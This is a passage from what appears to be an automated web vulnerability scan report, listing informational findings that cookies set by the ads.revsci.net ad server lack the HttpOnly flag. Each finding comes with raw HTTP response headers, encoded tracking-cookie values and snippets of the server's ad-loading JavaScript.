CEzm9iTP+ybJO3g6SP4zc+3wJvDQesZNKNHaoyLl27uGbsEbm0ngVT9j6S3LkyvKGQbfSco5brfhcFhccxGhRgzwi6y3w34eaUqdPs9rNEjOF+NK3dQBqFjfm5TCVJ6ScRSDYVwolf7qjDYPQ2w53tnDNaLKsbFZTLc3tntGaGlARPYKdoO2bZ1UeyMAWxLRb+K8YQ05VpuOzKEHJKmWVnt9S6QgLmFgcY7Rpf6tcZC0mNJA3l6E02FagVoi33Sz74DdHN5Lxj7au1Swn9ddXK3mpiHgjfI2ecHDEIep2bE71AaS1zw3pQyZJTAcGINFDZMqVr9xPNOjuvHIWLOV3SfigOvTj4lYY8LITvjocn7C8PBzbPLLMD3uX6TTe9en45wPDe95MttMa+YdpDzSWRw6TXbUXHDyaijcoa3Z/RB2KibsTEIRaHSVBh7L38+SwueaJDlU"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:11 GMT
Content-Length: 2174

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.59. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_nlbG="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7g3IqOW4NzmeNmW5CpfDi1iz2+RefXIKCFOZqdff8LZ0fiJghVv1hoPrkGGV5luxQek5y8BQn+Z9prQUM2WJZ5fTtL8myjqodMrmoMgdbgq/o91bP5Zj9EonQ6upsXVM8j46DiFKDNBOr47b9ZV4d397t6ERnZY6m6gRNt2Xc/Tpfs7Wp2p7g6YNCGCjTgnoD9KLAWxWO0wQ+lb0sU1G20+RcIC4Arm+lNZ0px2ISb0zL225xowLBSwW8dDCxrGP5vY5mdjl9sP4SpdGsET2LVoLtOkpnQeGICqPsl45LmYfGd/3ZZ/kNEKlC9ZFAb1C+lIt+jJO55D3uc7sEEZJoai3t+2NE5tIlMDSGSSOxrsM2na1pel4bsYoEkrKzbjWXPLWp3nDh8JfKGqgSTy5L6oOyJl2spLBxxhLumFC3nGUN8eMjGI6zvt0COjb4opSlV9HaBy/tnGRw8dZmE0fxxtgoFZsSMQSHLQe5smdrLKWtRDhY+r9TyesjaeWKZu83uJXVMp2sKHI285sWqCTiQi0lkeP3qczzIvkOOpR8MiZKZzulpy7RlHnkNbsqdtIciC5MPLLP0Z3JtK78MZ98GhV2PiLW57/wNjWqPXdg/pa34BEhNL2+1B2jPxSmv/iNGbDFvSGXYmrpfJjy3IiExZiht2Ueuiq7d03V7/n0UM/GYCh9duQOWL+xMjiOjf26xUXjavMGinA+xFMCEY6OSqT4UDBixrsfTOE1pmavtBIMzWfSULR22he0VxqQ7mjaj+cGQOvR3qNykguotbN0IFcByotDhKtcjC2L+Tccw7zH1Nuz39ztGmFh0H5AQx4CPihTMOhZzB7qLwBOIse5zXX/e5W0t1lAxi+G3ij7Yg0sR1oCv17TU3NOU+NdO3/z/9agDHrS8nm3H9MlyfxSeejEGf1pcXieFuSeKRRsj3gQIV5MjDv/pOpnryRtMIs2LO+Dhiz+w7Q/7z/wy0jMMpRA4qivdxIzbj507DGFj1Mnd1CSwinO+cB8QjhX3ydihLInu0vJh1Sq0YAiAinb33t93pTUWeRMuK4OK+bFMJc4W4Y3N6FftW3j9DhEX3pW+p6Mc/yVTnkH3i8u9leHJodTvE7Nu62BTO91449QtmyOAfcfJpCK2PnyRDE1FOlr5glA/iR6lyV4/6uoj4vT46IpXeFCf5B/vCDqtq5psRiF5+EjXePj3bgUlkmH1S5dfeXgU5cGv+cBlQlfjuYPGjIC3w0cUPNYr7Pnl8jOOihEdibTjE0y/pRQT7gbUjp5fl67fbZKtgiKjm6norre/kL837/zIV0QTaDfciblKDMDM+EFsR6FNUS8OygTKqDg6g5NKGeiqig=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMV4y+jOBYULQEE166YFQ6DmFfDqOqv5R26co+k4LFAgBjGPlweqC9ZQYFpxPJjE5QxDQ+XEM189Us/bQaKuU9loF4qvq/peYNF303pzfdAGd8ZbwIDlcLT5zMa+oodhDU86DNQ2JygJaTtmrY0+cP2MTkJ4rHjnEpMvXaIYKg71lildXqN3h3DAKOKoeCWeeo4599W8ETnPCODBu3K3LFyU+phqLavjvc9zPuzgdYToQ4g+XJNLb2JXGZCd7C65YyWYYrgbmntw+k3/heaq+wDe0VS8gMqj46cv4cb8BStL/X/rmGyG6s7i2SMw56JJ/CVjavL3Qpx5Jvs7EyWgEIm48o9iklXltCb9za/GnRk4zy39xByfOshbqnZZm8zU97WhojHzdzjrRS4uJ4aNSY/fhOZ/2aPVvzaG9ZnYRJ0QaA0FGoTNaHFDsfz5e2qYlaY5tUSXvHLU9+PJdHgvtLWdTrly7qN6BkH8lUf6Hdnql8viBVqij6cKKFcjil2V+KxJNzFiqhmI49Guih0q0V+LbkkHdckgzgyfylLNbdI9B6/3UUOO4wTNHU1IHl+WxOrS0Aa0Ikbu1wE9zuu+mGK3XF5rLQ5FSoo3Gyw0ljuxKt3lEUylLa8b4kE2aFiz+mCXvyVAJw8ySz5ps0PE2yC0kCH91/GzXpMtv7+7ACqeJchCZ8/og9Hv4Hmw/jGSPDR1/zN3aH0zWSCEz2iKnnwIVQDClrIjB7xT/VhzNuxv63WNtcobyeVv+FHQAteCAoACn2VsOCUvqM8Ghb0M7MHImIUEE4loJ6csSHYe2KJGhtpvB8k3sn0oVYiPIxrHuCOcr63NZd9Av/PJU6gimCnjSx91g2ixX3wO5/UVbaQlO0pTn46lyXVP2HCVnU+Xj4IJjP4BKyZgTpZyL+xwTdvzkTO3zu57GoUnTpi4616puJysUwfFnZajue+lbU2rFeoe+noTjkCjTL0xNtoTfJFXPXpN+Ci+Kr/0TNBI2N+AE2+F0zMsFD0ZEx1Rr55m7+2Vcnf2RhoCXM11ehD+e6+mTzM8dsvUYxshgKjy0Wk/peLnjMU/jBSkwu4EirjmHloSU+M68Sl1WtGJWM+IioB3kwKUUbOJtOCjARWhvGWLGY03OBE9J2DN1OAJxtm7Ug8SvE9tambnY/6akqIKVlsioYMrFdifb8xF24vqA2gype2fBUNMzK4SgWdgJXVIUk8xLXv2KI+XmaBS8/ohg7DOFOPtk4XP5DEEClyDYPmrkLPUL8PuBVfhYIrH+jrnOYBJ9LuXimalnNbrUPYN2XeL6K6wLsKyD6+Uo/0FgqrukMBw6lYmrJfr3n1Upllp1DOkbpSAskN5QwKzHO3SAKXP+tEA/xhQswseY0jtmEtLb9EEMCfPpyCmgV2k9Qt7j6Js6JK6MskVDjiIDMnYuKQsY4q6bLCoRAsBi8YRLb2vsp+DkTbxAxw7Kcb1MxcEKLPiFdUaZNyd82f5D6P5NkPlgX3UMdI06BEaGrENf1JmHbNBk2ufUcX8pUyJmXffWSzlkg9ymXCL5tCgZtfRy2YMKTrIGns0mcy2+c3WlEvp4swz9IqfAnxzqOaXALRL+cOkk8KWfSwoY6KAhz8Ouop+isEbiu7SFeycr8jS92TZrraHl2fpCVUl5msDJTkH7ZBJh5Hszbc5+PELQbx9Ss7A7jrnxQ1ORHgubxzW+nV11HPQHJsCmG0W5+2mUxq6P6rb5oK0q7eUemBZSL77jFXzhpPhcosHvKoXS9rhHnLqTdWnUVZa1dAsan2Sn7wu4c8uYaC26Y7zF7FtA5a0VdHdbY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_KXHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KXHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nlbG="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7g3IqOW4NzmeNmW5CpfDi1iz2+RefXIKCFOZqdff8LZ0fiJghVv1hoPrkGGV5luxQek5y8BQn+Z9prQUM2WJZ5fTtL8myjqodMrmoMgdbgq/o91bP5Zj9EonQ6upsXVM8j46DiFKDNBOr47b9ZV4d397t6ERnZY6m6gRNt2Xc/Tpfs7Wp2p7g6YNCGCjTgnoD9KLAWxWO0wQ+lb0sU1G20+RcIC4Arm+lNZ0px2ISb0zL225xowLBSwW8dDCxrGP5vY5mdjl9sP4SpdGsET2LVoLtOkpnQeGICqPsl45LmYfGd/3ZZ/kNEKlC9ZFAb1C+lIt+jJO55D3uc7sEEZJoai3t+2NE5tIlMDSGSSOxrsM2na1pel4bsYoEkrKzbjWXPLWp3nDh8JfKGqgSTy5L6oOyJl2spLBxxhLumFC3nGUN8eMjGI6zvt0COjb4opSlV9HaBy/tnGRw8dZmE0fxxtgoFZsSMQSHLQe5smdrLKWtRDhY+r9TyesjaeWKZu83uJXVMp2sKHI285sWqCTiQi0lkeP3qczzIvkOOpR8MiZKZzulpy7RlHnkNbsqdtIciC5MPLLP0Z3JtK78MZ98GhV2PiLW57/wNjWqPXdg/pa34BEhNL2+1B2jPxSmv/iNGbDFvSGXYmrpfJjy3IiExZiht2Ueuiq7d03V7/n0UM/GYCh9duQOWL+xMjiOjf26xUXjavMGinA+xFMCEY6OSqT4UDBixrsfTOE1pmavtBIMzWfSULR22he0VxqQ7mjaj+cGQOvR3qNykguotbN0IFcByotDhKtcjC2L+Tccw7zH1Nuz39ztGmFh0H5AQx4CPihTMOhZzB7qLwBOIse5zXX/e5W0t1lAxi+G3ij7Yg0sR1oCv17TU3NOU+NdO3/z/9agDHrS8nm3H9MlyfxSeejEGf1pcXieFuSeKRRsj3gQIV5MjDv/pOpnryRtMIs2LO+Dhiz+w7Q/7z/wy0jMMpRA4qivdxIzbj507DGFj1Mnd1CSwinO+cB8QjhX3ydihLInu0vJh1Sq0YAiAinb33t93pTUWeRMuK4OK+bFMJc4W4Y3N6FftW3j9DhEX3pW+p6Mc/yVTnkH3i8u9leHJodTvE7Nu62BTO91449QtmyOAfcfJpCK2PnyRDE1FOlr5glA/iR6lyV4/6uoj4vT46IpXeFCf5B/vCDqtq5psRiF5+EjXePj3bgUlkmH1S5dfeXgU5cGv+cBlQlfjuYPGjIC3w0cUPNYr7Pnl8jOOihEdibTjE0y/pRQT7gbUjp5fl67fbZKtgiKjm6norre/kL837/zIV0QTaDfciblKDMDM+EFsR6FNUS8OygTKqDg6g5NKGeiqig=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4y+jOBYULQEE166YFQ6DmFfDqOqv5R26co+k4LFAgBjGPlweqC9ZQYFpxPJjE5QxDQ+XEM189Us/bQaKuU9loF4qvq/peYNF303pzfdAGd8ZbwIDlcLT5zMa+oodhDU86DNQ2JygJaTtmrY0+cP2MTkJ4rHjnEpMvXaIYKg71lildXqN3h3DAKOKoeCWeeo4599W8ETnPCODBu3K3LFyU+phqLavjvc9zPuzgdYToQ4g+XJNLb2JXGZCd7C65YyWYYrgbmntw+k3/heaq+wDe0VS8gMqj46cv4cb8BStL/X/rmGyG6s7i2SMw56JJ/CVjavL3Qpx5Jvs7EyWgEIm48o9iklXltCb9za/GnRk4zy39xByfOshbqnZZm8zU97WhojHzdzjrRS4uJ4aNSY/fhOZ/2aPVvzaG9ZnYRJ0QaA0FGoTNaHFDsfz5e2qYlaY5tUSXvHLU9+PJdHgvtLWdTrly7qN6BkH8lUf6Hdnql8viBVqij6cKKFcjil2V+KxJNzFiqhmI49Guih0q0V+LbkkHdckgzgyfylLNbdI9B6/3UUOO4wTNHU1IHl+WxOrS0Aa0Ikbu1wE9zuu+mGK3XF5rLQ5FSoo3Gyw0ljuxKt3lEUylLa8b4kE2aFiz+mCXvyVAJw8ySz5ps0PE2yC0kCH91/GzXpMtv7+7ACqeJchCZ8/og9Hv4Hmw/jGSPDR1/zN3aH0zWSCEz2iKnnwIVQDClrIjB7xT/VhzNuxv63WNtcobyeVv+FHQAteCAoACn2VsOCUvqM8Ghb0M7MHImIUEE4loJ6csSHYe2KJGhtpvB8k3sn0oVYiPIxrHuCOcr63NZd9Av/PJU6gimCnjSx91g2ixX3wO5/UVbaQlO0pTn46lyXVP2HCVnU+Xj4IJjP4BKyZgTpZyL+xwTdvzkTO3zu57GoUnTpi4616puJysUwfFnZajue+lbU2rFeoe+noTjkCjTL0xNtoTfJFXPXpN+Ci+Kr/0TNBI2N+AE2+F0zMsFD0ZEx1Rr55m7+2Vcnf2RhoCXM11ehD+e6+mTzM8dsvUYxshgKjy0Wk/peLnjMU/jBSkwu4EirjmHloSU+M68Sl1WtGJWM+IioB3kwKUUbOJtOCjARWhvGWLGY03OBE9J2DN1OAJxtm7Ug8SvE9tambnY/6akqIKVlsioYMrFdifb8xF24vqA2gype2fBUNMzK4SgWdgJXVIUk8xLXv2KI+XmaBS8/ohg7DOFOPtk4XP5DEEClyDYPmrkLPUL8PuBVfhYIrH+jrnOYBJ9LuXimalnNbrUPYN2XeL6K6wLsKyD6+Uo/0FgqrukMBw6lYmrJfr3n1Upllp1DOkbpSAskN5QwKzHO3SAKXP+tEA/xhQswseY0jtmEtLb9EEMCfPpyCmgV2k9Qt7j6Js6JK6MskVDjiIDMnYuKQsY4q6bLCoRAsBi8YRLb2vsp+DkTbxAxw7Kcb1MxcEKLPiFdUaZNyd82f5D6P5NkPlgX3UMdI06BEaGrENf1JmHbNBk2ufUcX8pUyJmXffWSzlkg9ymXCL5tCgZtfRy2YMKTrIGns0mcy2+c3WlEvp4swz9IqfAnxzqOaXALRL+cOkk8KWfSwoY6KAhz8Ouop+isEbiu7SFeycr8jS92TZrraHl2fpCVUl5msDJTkH7ZBJh5Hszbc5+PELQbx9Ss7A7jrnxQ1ORHgubxzW+nV11HPQHJsCmG0W5+2mUxq6P6rb5oK0q7eUemBZSL77jFXzhpPhcosHvKoXS9rhHnLqTdWnUVZa1dAsan2Sn7wu4c8uYaC26Y7zF7FtA5a0VdHdbY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:37:47 GMT

GIF89a.............!.......,...........D..;

14.60. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_G9_S="MLsXrrEOpxpv55C28tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YFJsaw08qSR0PlQ+NWVPKJRSeakCP8BKl+9vpw/cPKd8tMuxPMCPoyxK8+ZjwDWyB3QMrRsmCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3xqwMP1zgKetVA0BJNDkK20CkficwaFYzIKDZj0KoqzqA1plxgzv/HJ62flvdxhJ1Gxc/BJ/Jkbz0IOuABhmPV05MhqOZD1eXu7sZ4FJ+3eLS0lWDg6HphwKX4gWwd2TZjHpNiYllNlCCt8+VPltAQi3QZQDF7gqUh3eOe1UMhdJxDYoDprFGFL0tgWNie0vdlcMg7d9TDMHvdWXtnwVDETYEb0+0k2lAsYlAa0wyNfiS+1z/gYvdtYy5wMFuUlaQGZ46942BuOwVh0JbAUSGUHgxiWAiJSgm4uSRkM17T7hE3OXEIVJlRaMcX/neeys7HYY7MWGQdhwbw5QP6+mxS8XJ42CRb1O9S2ZH020pDZTLP/2xbvm80WIj4KrD88n9gyyojJIW9vWIMUtdlpg1OxK5zL4VkGL3cLuAJe0xvjKA7bfLIskGGuMlscDOPymQVA2MMlYO1qHEFdDJtI4pCc5RQanuRi6mbbQkxKW3NradsayUtcjFwByl4q0Ns2NHEVcC5yQB/eMs6d4KktD/gnAdAaArbd36hf2ZjHD1oVxkBxCfsc7dDVAyfC/JpkL2UBhmZJZNlL0TCaRdPwg3P/Bh1VheUPetY5IpoWRiVHoAgFMBjn1aTdZw/bhXXNm4VF802HpgDDbwPCQ7mdVOnQAgCyx7Xb8pud4W1ItqEsomU3WoblAx5/ljOZesso+t7L7zFVD+OCiKfqhMy6irDFWju3OFon4GkOvNY9ISl7k3MQRhTrsGzm5ANbPDN4T8I3J/OPR6bDbHY2kiMm+Uk+/uW4K/eiliOo4LICBO/LHnNyWfvUFM7uJnqQhH89Z8RrroFex4a+6I/pnH/Ls01Kep6c/sqiL+d+aVz548eZuZtbEtV6ZQP1TyInHh5N0JPno9ps+A971MFf9IRfGPz5WbAifoCCEK0l4Gwj3YGgQqicfOmPUmQrEnfHaIUdHlruFHFC7FekovubN9IZPuGAqrTeRT8jq5Jp7gEGdlcV49FZLOXxKhVEKIxuSX/PL6xnFfi+3oy84eLsQer1wahgrfrw7xbkQDYVMIqWOiG9Eq2ed0zaeb3vLaINwr/mkGOJKnXg0wl66HlxTleLBBKEhtU3fCNjORp/ElV91Ici4BBDgSU0B7enpTQzS5bf3LCTza/qK+il829xl3RlF12J/NPO5Ja6nB0PGmZypEvg+obtEbuglgXQdPgeflHNvJJstEIZMKKbG73c4rOb993WKfzmQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z7uOqvJR0SNgYO9rFA7CKKB3cozzIdHGjDg2GGihSl38aywkVPVOtaw0GYpb8wbKFEoJ4Hcf23NGtxzjLNjNuJurratNJclKNlnd9kzlWzI5NtujBhqBWWTvdbDCExI1GmrTV9+t5Qks8B2hMYN+2JGnOr7DoSJTvO0PaX3MMt1WYWwvzwFp8R0gsr4WhgVAZORHh0ZLSweLXTo2rLuvFLUXSFwSh2CBWYf5waqWg6FOMqpGQAHBvSeUfM6ov4VVfErYTOmeKF/pbg0OB15tgdJXYh9msh4wx9rx1++0omtJcttyXX8psg0RFshrgzw3uNwQOL5/4Bp/nD9j3X8NOg+dTXBgyQxTjPYKp49l99X/nliGkZ4z6cssziKyg2VmsDy5/Ec2BBARlr4acUHvdGXFLstABR87BjYCnxClCN/BWwe0z7B1mEXTKiAcj9o8mxSkMa1UZ1xZ0rk288ocsm3TMPhrqjaL4bzGrk2gzm5VxKcFW8401eFfLF8rfZKS6Q++UsgSccCDBPlNF1r/N9QYDL1Tq3ssuCoS7HalBy9EaaIsoULjCQDYbmSv0pV1vxJbHeBjvVECwR1N9bcPwGwMvnTyVvp7LetdvcJ2Wbjkwyltj1+JZErC1YDjfccBz1anvzew6CzqHx8L1CRbl1jAMEWa7ge3rsvpF3wKA/hDt65DYYEOfLBkXQHbTea0eTFmoDh6s2ghA/i63LKGRwLgKp3bQqbc49tyzZdDx0fuCQuONaAB/piUUptvOnIaTduWL+WiiFIuocQeWylRtlN7xS+vlsvOw9uBVgLUUTzxVKCNtL35+hiNBpLBXsUwwJOX4bVhSAZkToM/noTwSN8mB3dyb/C8jUcPM8r38/FADFc52dhJySTXbFsyPZts9RhKvtBndBTEO/D/2xdu/StA3LWzJHQIcoitFFG5SQKKoSswDtldD5gfYCVOr8nRXk7GVTF/Q35kHNr+U3zibnEIHpCMPqcVOoT4KwUB4733Px03aQaq5xmE5V4vig8CWJVP5MbSbt7PH/6ZDdk2qlecaHojQv6+pswZMaZEVNiygNS2D8aIvemlup34PcX7GsFsYNDKXYRA/RKMK+zlUjMDHZMbyHToyybX49t1qTWKbr/cz2zNm4cRiTKD0vjdfyHDSVasz/IoblG3aqiP+9nvYuUMQuaai1LmXu7nx968NLV4d/zJIdvOyan/9u/pBbh4x1zd5KFIsGW60anqWRbLMpTmt+dOCfrIOTNQ1Eao5qx1igbggK4cIy9qIiNEXCw7sKCD4f0uKEJPJj7ImwqlvknZIKkRjFcR5I2/q1cFad40CWx/bUtUza29oL0un+jskHMd6kf+Qc7aq4KZNsO5wW84lQa48sKaHVN4NDwMiVwTBF9w5Al/S4uRw3dHJ5oM6ERbSofk3DnPopCFqVreGUP4wvGwVAVP70nK51xkhFjXSBgxzer+/7xvw6GV9UAb6wXT2102bz2CWwPWL5xjufpN5o57ve1w5sefuCGuvUEWDaOSfxLODBuZ3WeHOTSoX+B1g4N5ysz0gGgzh2d09ivuTg9KO1Zt34hNNwjXCpUAhMJQYIj37Vg7I+lEVOTMNf0tOKjsv+eRSSALE9hRu/JjbQu6d5WPQqQ4sHYWL986PKwsqKLeRZNbnN9D3yp/EqKJPmRH+2KZlmuAlRR0SQuS5iY0IKYNTCLw+pU67RpN/haHkbLTVbxtYpIJOIEum3+/1evQx+KKBg1fNpoQRJuiy5sGf47ULyOwbV7R1B1815tz53RzlY3ATXdhc="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hjCW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hjCW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_G9_S="MLsXrrEOpxpv55C28tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YFJsaw08qSR0PlQ+NWVPKJRSeakCP8BKl+9vpw/cPKd8tMuxPMCPoyxK8+ZjwDWyB3QMrRsmCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3xqwMP1zgKetVA0BJNDkK20CkficwaFYzIKDZj0KoqzqA1plxgzv/HJ62flvdxhJ1Gxc/BJ/Jkbz0IOuABhmPV05MhqOZD1eXu7sZ4FJ+3eLS0lWDg6HphwKX4gWwd2TZjHpNiYllNlCCt8+VPltAQi3QZQDF7gqUh3eOe1UMhdJxDYoDprFGFL0tgWNie0vdlcMg7d9TDMHvdWXtnwVDETYEb0+0k2lAsYlAa0wyNfiS+1z/gYvdtYy5wMFuUlaQGZ46942BuOwVh0JbAUSGUHgxiWAiJSgm4uSRkM17T7hE3OXEIVJlRaMcX/neeys7HYY7MWGQdhwbw5QP6+mxS8XJ42CRb1O9S2ZH020pDZTLP/2xbvm80WIj4KrD88n9gyyojJIW9vWIMUtdlpg1OxK5zL4VkGL3cLuAJe0xvjKA7bfLIskGGuMlscDOPymQVA2MMlYO1qHEFdDJtI4pCc5RQanuRi6mbbQkxKW3NradsayUtcjFwByl4q0Ns2NHEVcC5yQB/eMs6d4KktD/gnAdAaArbd36hf2ZjHD1oVxkBxCfsc7dDVAyfC/JpkL2UBhmZJZNlL0TCaRdPwg3P/Bh1VheUPetY5IpoWRiVHoAgFMBjn1aTdZw/bhXXNm4VF802HpgDDbwPCQ7mdVOnQAgCyx7Xb8pud4W1ItqEsomU3WoblAx5/ljOZesso+t7L7zFVD+OCiKfqhMy6irDFWju3OFon4GkOvNY9ISl7k3MQRhTrsGzm5ANbPDN4T8I3J/OPR6bDbHY2kiMm+Uk+/uW4K/eiliOo4LICBO/LHnNyWfvUFM7uJnqQhH89Z8RrroFex4a+6I/pnH/Ls01Kep6c/sqiL+d+aVz548eZuZtbEtV6ZQP1TyInHh5N0JPno9ps+A971MFf9IRfGPz5WbAifoCCEK0l4Gwj3YGgQqicfOmPUmQrEnfHaIUdHlruFHFC7FekovubN9IZPuGAqrTeRT8jq5Jp7gEGdlcV49FZLOXxKhVEKIxuSX/PL6xnFfi+3oy84eLsQer1wahgrfrw7xbkQDYVMIqWOiG9Eq2ed0zaeb3vLaINwr/mkGOJKnXg0wl66HlxTleLBBKEhtU3fCNjORp/ElV91Ici4BBDgSU0B7enpTQzS5bf3LCTza/qK+il829xl3RlF12J/NPO5Ja6nB0PGmZypEvg+obtEbuglgXQdPgeflHNvJJstEIZMKKbG73c4rOb993WKfzmQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z7uOqvJR0SNgYO9rFA7CKKB3cozzIdHGjDg2GGihSl38aywkVPVOtaw0GYpb8wbKFEoJ4Hcf23NGtxzjLNjNuJurratNJclKNlnd9kzlWzI5NtujBhqBWWTvdbDCExI1GmrTV9+t5Qks8B2hMYN+2JGnOr7DoSJTvO0PaX3MMt1WYWwvzwFp8R0gsr4WhgVAZORHh0ZLSweLXTo2rLuvFLUXSFwSh2CBWYf5waqWg6FOMqpGQAHBvSeUfM6ov4VVfErYTOmeKF/pbg0OB15tgdJXYh9msh4wx9rx1++0omtJcttyXX8psg0RFshrgzw3uNwQOL5/4Bp/nD9j3X8NOg+dTXBgyQxTjPYKp49l99X/nliGkZ4z6cssziKyg2VmsDy5/Ec2BBARlr4acUHvdGXFLstABR87BjYCnxClCN/BWwe0z7B1mEXTKiAcj9o8mxSkMa1UZ1xZ0rk288ocsm3TMPhrqjaL4bzGrk2gzm5VxKcFW8401eFfLF8rfZKS6Q++UsgSccCDBPlNF1r/N9QYDL1Tq3ssuCoS7HalBy9EaaIsoULjCQDYbmSv0pV1vxJbHeBjvVECwR1N9bcPwGwMvnTyVvp7LetdvcJ2Wbjkwyltj1+JZErC1YDjfccBz1anvzew6CzqHx8L1CRbl1jAMEWa7ge3rsvpF3wKA/hDt65DYYEOfLBkXQHbTea0eTFmoDh6s2ghA/i63LKGRwLgKp3bQqbc49tyzZdDx0fuCQuONaAB/piUUptvOnIaTduWL+WiiFIuocQeWylRtlN7xS+vlsvOw9uBVgLUUTzxVKCNtL35+hiNBpLBXsUwwJOX4bVhSAZkToM/noTwSN8mB3dyb/C8jUcPM8r38/FADFc52dhJySTXbFsyPZts9RhKvtBndBTEO/D/2xdu/StA3LWzJHQIcoitFFG5SQKKoSswDtldD5gfYCVOr8nRXk7GVTF/Q35kHNr+U3zibnEIHpCMPqcVOoT4KwUB4733Px03aQaq5xmE5V4vig8CWJVP5MbSbt7PH/6ZDdk2qlecaHojQv6+pswZMaZEVNiygNS2D8aIvemlup34PcX7GsFsYNDKXYRA/RKMK+zlUjMDHZMbyHToyybX49t1qTWKbr/cz2zNm4cRiTKD0vjdfyHDSVasz/IoblG3aqiP+9nvYuUMQuaai1LmXu7nx968NLV4d/zJIdvOyan/9u/pBbh4x1zd5KFIsGW60anqWRbLMpTmt+dOCfrIOTNQ1Eao5qx1igbggK4cIy9qIiNEXCw7sKCD4f0uKEJPJj7ImwqlvknZIKkRjFcR5I2/q1cFad40CWx/bUtUza29oL0un+jskHMd6kf+Qc7aq4KZNsO5wW84lQa48sKaHVN4NDwMiVwTBF9w5Al/S4uRw3dHJ5oM6ERbSofk3DnPopCFqVreGUP4wvGwVAVP70nK51xkhFjXSBgxzer+/7xvw6GV9UAb6wXT2102bz2CWwPWL5xjufpN5o57ve1w5sefuCGuvUEWDaOSfxLODBuZ3WeHOTSoX+B1g4N5ysz0gGgzh2d09ivuTg9KO1Zt34hNNwjXCpUAhMJQYIj37Vg7I+lEVOTMNf0tOKjsv+eRSSALE9hRu/JjbQu6d5WPQqQ4sHYWL986PKwsqKLeRZNbnN9D3yp/EqKJPmRH+2KZlmuAlRR0SQuS5iY0IKYNTCLw+pU67RpN/haHkbLTVbxtYpIJOIEum3+/1evQx+KKBg1fNpoQRJuiy5sGf47ULyOwbV7R1B1815tz53RzlY3ATXdhc="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:38:25 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.61. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

